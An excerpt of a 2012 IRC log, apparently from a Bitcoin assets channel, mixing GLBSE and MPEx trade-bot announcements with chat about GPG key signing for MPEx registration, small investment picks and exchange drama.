0.715 BTC [+] Sep 26 00:38:27 I should have saved a few 100k for a possible bounce. These markets are whack Sep 26 00:39:23 [GLBSE] [OBSI.HRPT] 1 @ 0.065 BTC [+] Sep 26 00:39:47 [GLBSE] [GSDPT] 292 @ 0.0033994 = 0.9926 BTC [-] Sep 26 00:42:11 [GLBSE] [FPGAMINING] 1 @ 0.42 BTC [+] Sep 26 00:43:49 its taken a while but I finally doxxed usagi Sep 26 00:44:02 anything good ? Sep 26 00:44:02 http://www.huffingtonpost.com/2011/12/21/world-champion-masturbator_n_1163576.html?ncid=edlinkusaolp00000003 Sep 26 00:44:57 [GLBSE] [GMVT-BOT] 20 @ 0.09 = 1.8 BTC [-] Sep 26 00:45:06 This is great discussion Sep 26 00:45:12 I mean, honestly. Sep 26 00:45:22 arf, I can't use the syntax it seems Sep 26 00:45:40 [GLBSE] [ASICMINER] 1 @ 0.115 BTC [-] Sep 26 00:45:41 [GLBSE] [ASICMINER] 11 @ 0.11310001 = 1.2441 BTC [-] Sep 26 00:45:42 [GLBSE] [ASICMINER] 5 @ 0.1131 = 0.5655 BTC [-] Sep 26 00:45:43 what's your command BTC-Mining ? Sep 26 00:45:43 [GLBSE] [ASICMINER] 3 @ 0.112 = 0.336 BTC [-] Sep 26 00:45:44 [GLBSE] [ASICMINER] 1 @ 0.11001 BTC [-] Sep 26 00:45:45 [GLBSE] [ASICMINER] 5 @ 0.110001 = 0.55 BTC [-] Sep 26 00:45:46 [GLBSE] [ASICMINER] 3 @ 0.1100001 = 0.33 BTC [-] Sep 26 00:45:47 [GLBSE] [ASICMINER] 71 @ 0.11 = 7.81 BTC [-] Sep 26 00:45:56 DEPOSIT|AMOUNT Sep 26 00:45:58 lol Sep 26 00:46:09 sounds legit. Sep 26 00:46:12 I've done that for awhile Sep 26 00:46:13 but windows try to use a command of "AMOUNT Sep 26 00:46:22 I pick out some cash on my dresser and auction it off Sep 26 00:46:23 dude. Sep 26 00:46:23 and says AMOUNT is not a command =/ Sep 26 00:46:28 DEPOSIT|20 Sep 26 00:46:31 and you prolly need quoted Sep 26 00:46:49 Guess I'll try quoted Sep 26 00:47:27 lol Sep 26 00:47:30 mixed media Sep 26 00:47:46 Couldn't decode reply from MPEX Sep 26 00:47:49 I would. It sounds pretty cool. Sep 26 00:48:10 I have a neighbor who does stuff like that professionally. Sep 26 00:48:11 do you have mp's public key? Sep 26 00:48:20 Maybe 1 BTC at least. : P Sep 26 00:48:22 Bugpowder, yes Sep 26 00:48:30 I even signed it Sep 26 00:49:03 what's reply look like ? Sep 26 00:49:41 [GLBSE] [HYDRO.BONDS] 5 @ 1.4 = 7 BTC [+] Sep 26 00:50:24 Couldn't decode the reply from MPEx, perhaps you didn't sign the key? try running gpg --sign-key F1B69921 Sep 26 00:50:24 Traceback (most recent call last): Sep 26 00:50:24 File "mpex.py", line 51, in Sep 26 00:50:24 NameError: name 'exit' is not defined Sep 26 00:50:53 welllll Sep 26 00:51:15 Azelphur any guidance hiar ? Sep 26 00:52:11 BTC-Mining: what version of python Sep 26 00:52:33 oh hey look at this https://github.com/ageis/MPEx-bin Sep 26 00:52:38 I found it by accident when going to look at the code on github Sep 26 00:52:43 looks like someone packaged it Sep 26 00:52:48 aegis did neh ? Sep 26 00:52:55 indeed Sep 26 00:52:58 usagi: because there are limited places where you can trade options Sep 26 00:53:01 None, I use that exact package Sep 26 00:53:15 BTC-Mining: oh, your using ageis's package? Sep 26 00:53:22 aye Sep 26 00:53:33 I'm going to take a guess and say that it's two separate problems Sep 26 00:53:40 the main relevant one is that your keys arn't signed properly Sep 26 00:53:53 the second is that python libraries required arn't included in the binary Sep 26 00:54:05 but it only crashes when it wants to exit anyway, which is a null issue Sep 26 00:54:48 lol, looks like someone really needs nice mpex interface Sep 26 00:54:54 Hmm, I would have to install python? But then I could just use your tool directly Sep 26 00:55:13 python is nothing to do with signing your gpg keys Sep 26 00:55:15 jurov how's your thing coming along ? Sep 26 00:55:23 a nicer mpex interface would be great Sep 26 00:55:26 run the gpg command the python told you to run Sep 26 00:55:28 BTC-Mining you'd have to install the libraries for the thing to exit cleanly Sep 26 00:55:29 [MPEX] [F.GIGA.ETF] 6300 @ 0.00050723 = 3.1955 BTC [-] Sep 26 00:55:34 it makes little practical difference Sep 26 00:55:35 as long as it stays as secure Sep 26 00:55:51 just got it running, but found new bugs... so maybe tomorrow ;) Sep 26 00:55:58 Bugpowder mod6 is working on an android app that *might* be as secure Sep 26 00:56:06 Eh. But Azelphur, I already signed MPEx key Sep 26 00:57:07 If I try again it tells me I already signed it with my key. Sep 26 00:57:14 BTC-Mining: I don't really know then beyond it's a gpg issue Sep 26 00:57:40 I always get issues with gpg signing =/ Sep 26 00:57:41 all my python does is call gpg_list_keys and checks if the key is in the list Sep 26 00:57:48 [GLBSE] [ASICMINER] 11 @ 0.11299999 = 1.243 BTC [+] Sep 26 00:57:51 very hard for there to be a bug in my code there Sep 26 00:57:51 :P Sep 26 00:58:25 BTC-Mining did you sign it with the wrong key ? Sep 26 00:58:27 BTC-Mining: hurry up, these firesale prices for S.MPOE won't last much longer! Sep 26 00:58:30 such as a subkey ? Sep 26 00:59:08 it checks for F1B69921 Sep 26 00:59:15 Nope, I only have one key Sep 26 00:59:44 Yes, I signed F1B69921 with my key (EEEDE453) Sep 26 00:59:44 i ran into the same problem today but that was because i imported the private key and it was not trusted Sep 26 00:59:54 You have EEEDE453 mircea, right? Sep 26 01:00:01 mmm Sep 26 01:00:23 [GLBSE] [BFLS.RIG] 4 @ 0.6 = 2.4 BTC [-] Sep 26 01:00:34 check the key you sent lol, i can't. Sep 26 01:01:05 Looks like it is Sep 26 01:01:25 well then wtf. Sep 26 01:01:33 BTC-Mining try doing it by hand once Sep 26 01:01:33 BTC-Mining try webinterface Sep 26 01:01:36 as explained in faq Sep 26 01:01:50 at least this way we know if it's a gpg issue, a pympex ossue or wtf. Sep 26 01:03:05 aye, one sec Sep 26 01:10:32 I signed the order with my key then encrypted it with Mpex's key Sep 26 01:10:42 then pasted data... Sep 26 01:10:50 "Unrecognized signature. Please email your public key first." Sep 26 01:14:30 Guess it's a gpg issue Sep 26 01:15:08 well no Sep 26 01:15:17 if you signed it with a diff key then what you sent Sep 26 01:15:20 it'd complain thusly Sep 26 01:15:42 I only have one freaking key =/ Sep 26 01:15:48 hahah Sep 26 01:15:59 is there a subkey Sep 26 01:16:13 I don't even know what a subkey is. Sep 26 01:16:14 I was convinced I was sending the right key Sep 26 01:16:30 then I found out it was a sub key, signed by my master key Sep 26 01:16:36 took forever Sep 26 01:16:51 Can you manually specify the key fingerprint you are using? Sep 26 01:17:19 for example, I use "gpg --clearsign -u AA148EAF40BE9C02F091F382F1573A6B1578A821! " Sep 26 01:17:40 yes -u specifies key. Sep 26 01:17:51 How would I know? Sep 26 01:18:06 BTC-Mining : gpg the thing you signed, see what key it reports as having signed Sep 26 01:18:20 https://bitcointalk.org/index.php?topic=97178.msg1220868#msg1220868 incidentally, is the stuff quoted actually true ? Sep 26 01:19:50 F12DE6B4E1EF26F5768BE918F2758D83EEEDE453 (EEEDE453) Sep 26 01:20:06 Seems to be the public key I sent to mircea Sep 26 01:20:33 [MPEX] [F.GIGA.ETF] 2700 @ 0.00050723 = 1.3695 BTC [-] Sep 26 01:22:52 Aye, it's exactly the good key. So Mircea got my public key alright. Sep 26 01:22:55 hm Sep 26 01:23:04 i wonder wjat the matrter is Sep 26 01:23:52 8DDE8C2B4DE2278A95C3D65B9214FC6BF1B69921 is the public key I use to encrypt Sep 26 01:24:00 That seems fine... Sep 26 01:24:06 BTC-Mining : try nao. Sep 26 01:26:05 mircea_popescu your affiliate program doesnt work :p Sep 26 01:26:23 kakobrekla he needs to pay first you realise. Sep 26 01:26:55 ah right, i thought he already did. Sep 26 01:27:09 "Sorry, but you can't repeat orders." Sep 26 01:27:14 Wait what? Sep 26 01:27:18 well yes, you can't Sep 26 01:27:25 hmm Sep 26 01:27:25 gotta re-encrypt the signed thing Sep 26 01:27:31 otherwise repeat attax Sep 26 01:27:31 you need to signcrypt it again Sep 26 01:28:33 It works now. Sep 26 01:28:43 yeah. tbh it was my fault. sorry for the grief. Sep 26 01:29:10 No sweat Sep 26 01:29:22 As long as it works now Sep 26 01:31:35 [GLBSE] [RSM] 1 @ 0.29 BTC [+] Sep 26 01:35:48 The transaction should show up soon Mircea Sep 26 01:35:59 I guess I'm finally registered Sep 26 01:36:13 whee good for you Sep 26 01:36:30 I'll need an MPEx and a GLBSE section on my spreadsheet now. Sep 26 01:37:49 yay! Sep 26 01:38:06 ? Sep 26 01:38:30 I'll ask brendio to get my BIB.BVPS shares directly on MPEx Sep 26 01:38:52 Now, buy my S.MPOE Sep 26 01:39:01 ... no? Sep 26 01:39:24 OK, buy F.GIGA and let me borrow it Sep 26 01:40:02 NNOhoho Sep 26 01:40:09 lmao Sep 26 01:40:25 I'm not touching even F.GIGA with a 50 kilometer pole Sep 26 01:40:34 BTC-Mining : if you keep clean books you can prolly offer brokerage nao Sep 26 01:40:49 I guess Sep 26 01:41:11 i thought youy held giga ? Sep 26 01:42:17 Yeah but I don't want F.GIGA Sep 26 01:42:25 a Sep 26 01:42:29 [GLBSE] [HYDRO.BONDS] 1 @ 1.352 BTC [-] Sep 26 01:42:31 [GLBSE] [HYDRO.BONDS] 1 @ 1.3002 BTC [-] Sep 26 01:42:32 [GLBSE] [HYDRO.BONDS] 1 @ 1.3 BTC [-] Sep 26 01:42:32 http://www.betsofbitco.in/item?id=566 look at all that hot action Sep 26 01:42:36 Because it's not going to be upgraded Sep 26 01:42:41 So what is so good about BVPS Sep 26 01:42:49 rg. Sep 26 01:43:12 Is this a security I should buy in then sell 2 days later in a panic? Sep 26 01:43:27 It's not mining and I want diversification Sep 26 01:43:32 S.DICE is finally making money again Sep 26 01:43:57 I'm going to try to recruit a few more non-bitcoin people to invest in S.DICE Sep 26 01:44:02 [GLBSE] [ASICMINER] 9 @ 0.1111 = 0.9999 BTC [-] Sep 26 01:44:17 The only reason for going to MPEx for me is S.DICE and S.BVPS Sep 26 01:44:24 mircea_popescu: heh, forgot about that Sep 26 01:44:25 what is good about BVPS? Sep 26 01:44:30 s.bvps is a vps provider ; s.dice does gambling Sep 26 01:44:42 what is the monthly yield Sep 26 01:44:43 Both are not mining... Sep 26 01:44:48 what is the growth rate? Sep 26 01:45:00 30-50 BTC / 1 000 000 shares Sep 26 01:45:07 Bugpowder look in the divs, also rg is the guy running it so pummel him with investor q's Sep 26 01:45:07 oh Sep 26 01:45:18 1000000 Sep 26 01:45:22 that is small number Sep 26 01:45:26 So about 1% per month Sep 26 01:45:27 !ticker s.bvps Sep 26 01:45:29 [MPEX:S.BVPS] 1day: 0.00317533 / 0.00317533 / 0.00317533 (53 shares, 0.17 BTC), 30day: 0.001175 / 0.00339197 / 0.003801 (31871 shares, 108.11 BTC) Sep 26 01:45:33 1 - 2 % Sep 26 01:45:50 yea he does maybe 1.x% closer to 2%ish Sep 26 01:45:58 Depending on where between 0.0025 and 0.0050 you buy it I guess Sep 26 01:46:06 [MPEX] [F.GIGA.ETF] 500 @ 0.00050722 = 0.2536 BTC [-] Sep 26 01:46:12 It's not much but eh Sep 26 01:46:21 uhhh Sep 26 01:46:24 that is sold Sep 26 01:46:26 solid Sep 26 01:46:42 Can't only have mining Sep 26 01:46:53 Any real portfolio that returns 1% a month is godly. Sep 26 01:47:12 esp in btc Sep 26 01:47:49 Yeah, but when it's good stocks. BitVPS remains risky. Sep 26 01:48:03 And prices in BTC will go down if BTC price goes up. Sep 26 01:48:19 So less income with higher USD/BTC value Sep 26 01:48:35 quite possibly Sep 26 01:48:41 anyway, im off. have a good day all. Sep 26 01:48:42 I'd consider it a USD investment **** BEGIN LOGGING AT Wed Sep 26 09:24:58 2012 Sep 26 09:46:44 [MPEX] [S.MPOE] 13027 @ 0.00035825 = 4.6669 BTC [-] Sep 26 09:46:46 [MPEX] [S.MPOE] 13173 @ 0.00035819 = 4.7184 BTC [-] Sep 26 09:47:52 [GLBSE] [KRAKEN] 2 @ 0.009 = 0.018 BTC [+] Sep 26 09:49:01 [GLBSE] [GOLD] 2 @ 0.00996 = 0.0199 BTC [+] Sep 26 09:49:26 [GLBSE] [SILVER] 2 @ 0.009939 = 0.0199 BTC [+] Sep 26 09:50:17 [GLBSE] [KRAKEN] 2 @ 0.009 = 0.018 BTC [+] Sep 26 10:12:46 [MPEX] [S.MPOE] 23141 @ 0.00035945 = 8.318 BTC [+] Sep 26 10:12:47 [MPEX] [S.MPOE] 21200 @ 0.00035986 = 7.629 BTC [+] Sep 26 10:12:48 [MPEX] [S.MPOE] 20097 @ 0.00035995 = 7.2339 BTC [+] Sep 26 10:32:06 [GLBSE] [BTC-BOND] 1 @ 0.0098 BTC [+] Sep 26 10:33:01 [GLBSE] [BTC-BOND] 1 @ 0.00210001 BTC [-] Sep 26 10:35:20 [GLBSE] [OBSI.HRPT] 2 @ 0.058 = 0.116 BTC [+] Sep 26 10:36:59 [MPEX] [O.BTCUSD.C090T] 3 @ 0.26785724 = 0.8036 BTC [+] Sep 26 10:37:00 [MPEX] [O.BTCUSD.C090T] 997 @ 0.25511268 = 254.3473 BTC [-] Sep 26 10:37:39 [MPEX] [O.BTCUSD.C110T] 400 @ 0.0889155 = 35.5662 BTC [-] Sep 26 10:38:40 [MPEX] [F.GIGA.ETF] 7501 @ 0.00044032 = 3.3028 BTC [+] Sep 26 10:38:41 [MPEX] [F.GIGA.ETF] 6100 @ 0.00044028 = 2.6857 BTC [-] Sep 26 10:38:42 [MPEX] [F.GIGA.ETF] 5732 @ 0.0004402 = 2.5232 BTC [-] Sep 26 10:38:43 [MPEX] [F.GIGA.ETF] 4700 @ 0.00044019 = 2.0689 BTC [-] Sep 26 10:38:44 [MPEX] [F.GIGA.ETF] 5967 @ 0.00044018 = 2.6266 BTC [-] Sep 26 10:43:07 [GLBSE] [BFLS] 7 @ 0.44 = 3.08 BTC [-] Sep 26 10:44:36 [GLBSE] [GIGAMINING] 2 @ 0.63499999 = 1.27 BTC [-] Sep 26 10:47:19 [GLBSE] [GIGAMINING] 3 @ 0.635 = 1.905 BTC [+] Sep 26 11:03:48 [MPEX] [S.MPOE] 35697 @ 0.00035995 = 12.8491 BTC [+] Sep 26 11:15:45 [GLBSE] [PIMP] 1 @ 0.09 BTC [+] Sep 26 11:29:02 [MPEX] [S.MPOE] 9600 @ 0.00036086 = 3.4643 BTC [+] Sep 26 11:29:04 [MPEX] [S.MPOE] 29403 @ 0.00036066 = 10.6045 BTC [-] Sep 26 11:44:45 [GLBSE] [FUTUREFUND] 1 @ 0.000125 BTC [+] Sep 26 11:45:26 [GLBSE] [FUTUREFUND] 1 @ 0.00010003 BTC [-] Sep 26 11:54:59 [MPEX] [F.GIGA.ETF] 6115 @ 0.00044037 = 2.6929 BTC [+] Sep 26 11:59:56 [GLBSE] [OBSI.HRPT] 1 @ 0.05892999 BTC [+] Sep 26 12:02:54 [GLBSE] [OBSI.HRPT] 1 @ 0.05893 BTC [+] Sep 26 12:02:55 [GLBSE] [OBSI.HRPT] 2 @ 0.05895994 = 0.1179 BTC [+] Sep 26 12:02:57 [GLBSE] [OBSI.HRPT] 3 @ 0.05895995 = 0.1769 BTC [+] Sep 26 12:02:58 [GLBSE] [OBSI.HRPT] 1 @ 0.05896 BTC [+] Sep 26 12:02:59 [GLBSE] [OBSI.HRPT] 25 @ 0.05898997 = 1.4747 BTC [+] Sep 26 12:02:59 [GLBSE] [OBSI.HRPT] 18 @ 0.05898998 = 1.0618 BTC [+] Sep 26 12:03:14 [GLBSE] [BFLS] 1 @ 0.570114 BTC [+] Sep 26 12:04:02 [GLBSE] [GIGAMINING] 1 @ 0.6348 BTC [-] Sep 26 12:05:58 [GLBSE] [BFLS] 1 @ 0.54 BTC [-] Sep 26 12:08:46 [GLBSE] [MOVETO.FUND] 3 @ 0.95 = 2.85 BTC [-] Sep 26 12:10:40 [GLBSE] [ASICMINER] 1 @ 0.1165 BTC [-] Sep 26 12:16:47 [GLBSE] [PUREMINING] 1 @ 0.1 BTC [-] Sep 26 12:17:04 [GLBSE] [NASTY] 4 @ 0.399 = 1.596 BTC [+] Sep 26 12:20:06 [MPEX] [S.MPOE] 6597 @ 0.00036052 = 2.3784 BTC [-] Sep 26 12:23:21 morning :) Sep 26 12:23:27 any news about the SEC incident? Sep 26 12:26:05 grill a hotdog for three hours under a heat lamp, too Sep 26 12:26:18 [GLBSE] [ASICMINER] 99 @ 0.1165 = 11.5335 BTC [-] Sep 26 12:26:19 [GLBSE] [ASICMINER] 100 @ 0.1166 = 11.66 BTC [+] Sep 26 12:26:20 [GLBSE] [ASICMINER] 1 @ 0.1167 BTC [+] Sep 26 12:28:03 [GLBSE] [GSDPT] 2 @ 0.003399 = 0.0068 BTC [-] Sep 26 12:28:05 [GLBSE] [GSDPT] 2898 @ 0.0033994 = 9.8515 BTC [+] Sep 26 12:28:47 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:31:15 [GLBSE] [BMF] 1 @ 0.49 BTC [-] Sep 26 12:31:36 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:31:56 [GLBSE] [BMF] 1 @ 0.49 BTC [-] Sep 26 12:32:11 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:32:30 [GLBSE] [BMF] 1 @ 0.48 BTC [-] Sep 26 12:32:44 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:32:59 [GLBSE] [GSDPT] 20 @ 0.0033994 = 0.068 BTC [+] Sep 26 12:33:06 [GLBSE] [BMF] 1 @ 0.47 BTC [-] Sep 26 12:33:31 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:33:32 morgning Sep 26 12:33:36 morning* Sep 26 12:33:42 [GLBSE] [OBSI.HRPT] 11 @ 0.05898997 = 0.6489 BTC [-] Sep 26 12:33:44 [GLBSE] [OBSI.HRPT] 9 @ 0.05898998 = 0.5309 BTC [+] Sep 26 12:34:11 [GLBSE] [BMF] 1 @ 0.48 BTC [-] Sep 26 12:34:29 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:35:06 [GLBSE] [BMF] 1 @ 0.47 BTC [-] Sep 26 12:35:30 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:35:47 [GLBSE] [BMF] 1 @ 0.47 BTC [-] Sep 26 12:36:04 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:37:20 [GLBSE] [BMF] 1 @ 0.48 BTC [-] Sep 26 12:37:40 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:37:55 [GLBSE] [BMF] 1 @ 0.47 BTC [-] Sep 26 12:38:29 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:38:52 [GLBSE] [BMF] 1 @ 0.46 BTC [-] Sep 26 12:40:07 nice :P Sep 26 12:41:48 lol Sep 26 12:41:53 I am several DeaDTerras Sep 26 12:41:57 this is stupid xD Sep 26 12:42:30 any update on Pirate and SEC? Sep 26 12:45:12 [MPEX] [F.GIGA.ETF] 1600 @ 0.00044037 = 0.7046 BTC [+] Sep 26 12:48:10 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:48:54 [GLBSE] [BMF] 1 @ 0.455 BTC [-] Sep 26 12:49:48 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:50:13 [GLBSE] [BMF] 1 @ 0.45 BTC [-] Sep 26 12:51:12 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 12:51:51 [GLBSE] [BMF] 1 @ 0.44 BTC [-] Sep 26 12:54:46 [GLBSE] [NASTY] 3 @ 0.399 = 1.197 BTC [+] Sep 26 13:06:17 [GLBSE] [HYDRO.BONDS] 1 @ 1.2999 BTC [-] Sep 26 13:10:30 [MPEX] [S.MPOE] 21603 @ 0.00036121 = 7.8032 BTC [+] Sep 26 13:34:54 [GLBSE] [MERGEDMINING] 1 @ 0.06180001 BTC [-] Sep 26 13:34:56 [GLBSE] [MERGEDMINING] 2 @ 0.0618 = 0.1236 BTC [-] Sep 26 13:34:57 [GLBSE] [MERGEDMINING] 3 @ 0.06175 = 0.1853 BTC [-] Sep 26 13:34:58 [GLBSE] [MERGEDMINING] 88 @ 0.0617 = 5.4296 BTC [-] Sep 26 13:34:59 [GLBSE] [MERGEDMINING] 5 @ 0.0615 = 0.3075 BTC [-] Sep 26 13:35:00 [GLBSE] [MERGEDMINING] 1 @ 0.06 BTC [-] Sep 26 13:35:02 [GLBSE] [OBSI.HRPT] 3 @ 0.05898997 = 0.177 BTC [-] Sep 26 13:35:38 [MPEX] [S.MPOE] 8397 @ 0.00035933 = 3.0173 BTC [-] Sep 26 13:37:10 [GLBSE] [OBSI.HRPT] 2 @ 0.05898998 = 0.118 BTC [+] Sep 26 13:37:20 morning Sep 26 13:39:50 [GLBSE] [BIF.1YR.LOAN] 4 @ 0.8595 = 3.438 BTC [-] Sep 26 13:39:51 [GLBSE] [BIF.1YR.LOAN] 13 @ 0.86 = 11.18 BTC [+] Sep 26 13:40:37 o/ jurov Sep 26 13:41:55 !pl chmod755 Sep 26 13:41:56 !pl [@] [] Sep 26 13:42:01 hehe Sep 26 13:43:00 !crash market Sep 26 13:43:15 [GLBSE] [BAKEWELL] 1 @ 0.14899899 BTC [+] Sep 26 13:43:16 [GLBSE] [BAKEWELL] 4 @ 0.148999 = 0.596 BTC [+] Sep 26 13:43:21 dafuk is bakewell Sep 26 13:43:22 wtf is bakewell? Sep 26 13:43:24 lol Sep 26 13:56:09 [GLBSE] [FDBF] 1 @ 0.09000001 BTC [-] Sep 26 13:56:11 [GLBSE] [FDBF] 1 @ 0.09 BTC [-] Sep 26 13:56:12 [GLBSE] [FDBF] 8 @ 0.08 = 0.64 BTC [-] Sep 26 13:56:12 [GLBSE] [FDBF] 1 @ 0.05 BTC [-] Sep 26 13:56:49 [MPEX] [S.MPOE] 2820 @ 0.00036175 = 1.0201 BTC [+] Sep 26 14:00:12 [GLBSE] [OBSI.HRPT] 2 @ 0.05898997 = 0.118 BTC [-] Sep 26 14:00:14 [GLBSE] [OBSI.HRPT] 3 @ 0.05898998 = 0.177 BTC [+] Sep 26 14:00:15 [GLBSE] [OBSI.HRPT] 7 @ 0.05898999 = 0.4129 BTC [+] Sep 26 14:02:35 [GLBSE] [ASICMINER] 1 @ 0.116599 BTC [-] Sep 26 14:07:05 ~commercial break~ Sep 26 14:07:12 coinbr.com - your first chance to do MPEx business in realtime with nice interface & reasonable fees. Ask me for invitation. Sep 26 14:21:42 [GLBSE] [BFLS.RIG] 5 @ 0.56 = 2.8 BTC [-] Sep 26 14:21:55 [MPEX] [S.MPOE] 29061 @ 0.00036175 = 10.5128 BTC [+] Sep 26 14:21:56 [MPEX] [S.MPOE] 17046 @ 0.00036294 = 6.1867 BTC [+] Sep 26 14:22:11 [GLBSE] [BFLS.RIG] 20 @ 0.550001 = 11 BTC [-] Sep 26 14:23:32 ;;sen nefario Sep 26 14:23:33 Error: "sen" is not a valid command. Sep 26 14:23:36 ;;seen nefario Sep 26 14:23:36 nefario was last seen in #bitcoin-assets 1 day, 15 hours, 23 minutes, and 43 seconds ago: Those assets are not listed or traded anymore Sep 26 14:23:41 ;;seen nefario1 Sep 26 14:23:41 nefario1 was last seen in #bitcoin-assets 1 week, 0 days, 11 hours, 45 minutes, and 7 seconds ago: the sky is falling Sep 26 14:29:50 [GLBSE] [OBSI.HRPT] 1 @ 0.05898999 BTC [+] Sep 26 14:37:01 ;;later crash GLBSE:BFLS.RIG Sep 26 14:37:02 Error: The "Later" plugin is loaded, but there is no command named "crash" in it. Try "list Later" to see the commands in the "Later" plugin. Sep 26 14:47:01 [MPEX] [F.GIGA.ETF] 4200 @ 0.00044036 = 1.8495 BTC [-] Sep 26 14:47:02 [MPEX] [F.GIGA.ETF] 694 @ 0.00044036 = 0.3056 BTC [-] Sep 26 14:54:18 mornin. Sep 26 15:12:13 [MPEX] [S.MPOE] 951 @ 0.00036294 = 0.3452 BTC [+] Sep 26 15:14:13 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 15:14:38 [GLBSE] [BMF] 1 @ 0.43 BTC [-] Sep 26 15:15:26 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 15:16:03 [GLBSE] [BMF] 1 @ 0.42 BTC [-] Sep 26 15:16:05 [GLBSE] [BMF] 1 @ 0.4106 BTC [-] Sep 26 15:17:26 [GLBSE] [BMF] 2 @ 0.4999 = 0.9998 BTC [+] Sep 26 15:18:14 [GLBSE] [BMF] 1 @ 0.4106 BTC [-] Sep 26 15:18:15 [GLBSE] [BMF] 1 @ 0.4104 BTC [-] Sep 26 15:23:54 [GLBSE] [BITCOINMINV] 1 @ 0.12499999 BTC [+] Sep 26 15:24:17 [GLBSE] [TICKER] 64 @ 0.35 = 22.4 BTC [-] Sep 26 15:24:50 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [+] Sep 26 15:25:00 EskimoBob: I dunno, I think usagi has been under enough stress lately Sep 26 15:38:38 [GLBSE] [BTC-MINING] 2 @ 0.9578 = 1.9156 BTC [-] Sep 26 15:38:40 [GLBSE] [BTC-MINING] 2 @ 0.958 = 1.916 BTC [+] Sep 26 15:39:30 [MPEX] [S.MPOE] 11900 @ 0.00036031 = 4.2877 BTC [-] Sep 26 16:02:07 probabl Sep 26 16:02:18 I mean, I cant say Im too happy either Sep 26 16:02:40 I got shit from usagi, usagi got shit from me, we both got shit from nefario, goat had a shit orgy going on at his place, etc Sep 26 16:02:49 and theymos is selling out his share of glbse Sep 26 16:04:17 and some of the shit sort of washed over the side of the bowl into obsi's stall Sep 26 16:04:24 a tidal shitwave Sep 26 16:05:59 so much shit all over the place Sep 26 16:06:00 [MPEX] [F.GIGA.ETF] 2700 @ 0.00044037 = 1.189 BTC [+] Sep 26 16:06:01 [MPEX] [F.GIGA.ETF] 1654 @ 0.00044037 = 0.7284 BTC [+] Sep 26 16:06:11 EskimoBob: oh no no Sep 26 16:06:15 that even gets better Sep 26 16:06:23 someone called in the SEC hazmat suited clean up team Sep 26 16:06:55 and they're spreading the shit alllllllll over the place, like some flash mob reenactment of 2 girls 1 cup Sep 26 16:07:26 lol flash mob of 2 girls 1 cuo Sep 26 16:07:27 Sep 26 16:07:33 cup* Sep 26 16:08:36 yes, we even named the hemorrhoid, its called Earth. Sep 26 16:09:40 how many bitcoiners does it take to screw in a lightbulb Sep 26 16:10:09 1 to hold up the lightbulb, 12 to invest into a cambodian sharecropping initiative. Sep 26 16:11:12 lol Diablo-D3 Sep 26 16:11:35 kakobrekla: :D Sep 26 16:12:21 EskimoBob: GLWT Sep 26 16:13:44 who needs what? Sep 26 16:14:28 i think usagi and EskimoBob need to kiss and be friends again Sep 26 16:15:12 anyone seen Goat on recently? Sep 26 16:15:30 EskimoBob you call everyone a scammer Sep 26 16:15:46 gigavps: goat probably just gave up Sep 26 16:16:07 Diablo-D3 that would not be good Sep 26 16:16:26 so does usagi these days ;) Sep 26 16:16:56 i hope so Sep 26 16:17:13 goat undoutedly went off to chill and wait for nefario to chill Sep 26 16:18:18 pics or it didn't happen Sep 26 16:19:07 http://www.youtube.com/watch?v=RWF86D_UNxc Sep 26 16:19:11 not here. not my problem Sep 26 16:19:14 :D Sep 26 16:20:20 elmo dancing on the moon is the best Sep 26 16:27:38 [GLBSE] [YABMC] 16 @ 0.07010001 = 1.1216 BTC [+] Sep 26 16:27:39 [GLBSE] [YABMC] 5 @ 0.0701 = 0.3505 BTC [-] Sep 26 16:28:37 [GLBSE] [CIUCIU.BOND] 2 @ 0.09899 = 0.198 BTC [-] Sep 26 16:28:59 [GLBSE] [CIUCIU.BOND] 48 @ 0.099 = 4.752 BTC [+] Sep 26 16:30:01 [MPEX] [S.BVPS] 275 @ 0.00317703 = 0.8737 BTC [+] Sep 26 16:30:03 [MPEX] [S.BVPS] 450 @ 0.00319246 = 1.4366 BTC [+] Sep 26 16:30:04 [MPEX] [S.BVPS] 130 @ 0.00320487 = 0.4166 BTC [+] Sep 26 16:30:05 [MPEX] [S.BVPS] 450 @ 0.00320744 = 1.4433 BTC [+] Sep 26 16:30:07 [MPEX] [S.BVPS] 200 @ 0.00320948 = 0.6419 BTC [+] Sep 26 16:30:08 [MPEX] [S.BVPS] 50 @ 0.00322563 = 0.1613 BTC [+] Sep 26 16:30:09 [MPEX] [S.BVPS] 500 @ 0.00323503 = 1.6175 BTC [+] Sep 26 16:38:37 [GLBSE] [OBSI.HRPT] 14 @ 0.05898999 = 0.8259 BTC [+] Sep 26 16:39:36 hello Chaang-Noi Sep 26 16:39:49 [GLBSE] [OBSI.HRPT] 2 @ 0.05898999 = 0.118 BTC [+] Sep 26 16:39:51 [GLBSE] [OBSI.HRPT] 21 @ 0.05899 = 1.2388 BTC [+] Sep 26 16:39:51 [GLBSE] [OBSI.HRPT] 47 @ 0.05899999 = 2.773 BTC [+] Sep 26 16:39:57 hi giga Sep 26 16:40:14 hows it going? Sep 26 16:40:22 not bad, yourself? Sep 26 16:40:32 very well, thanks for asking Sep 26 16:40:44 :) Sep 26 16:41:07 i wanted to ask you about your delisting and the next steps you are taking Sep 26 16:42:34 at this time i think Nefario will relist it. Sep 26 16:42:51 o wow, that is great news Sep 26 16:42:53 if he wont i think he will get a scammers tag and that will kill glbse. Sep 26 16:43:18 why do you think he will get the scammer tag? Sep 26 16:43:47 if nefario does not list it its pretty much dead in the water unless we find a way to trust a transfur. Sep 26 16:44:39 nefario is sadly not doing a whole lot of things in a good way and he is being investiagted for a scammers tag on a differnt number of things. because of this i think he will just make things normal again. Sep 26 16:45:08 the 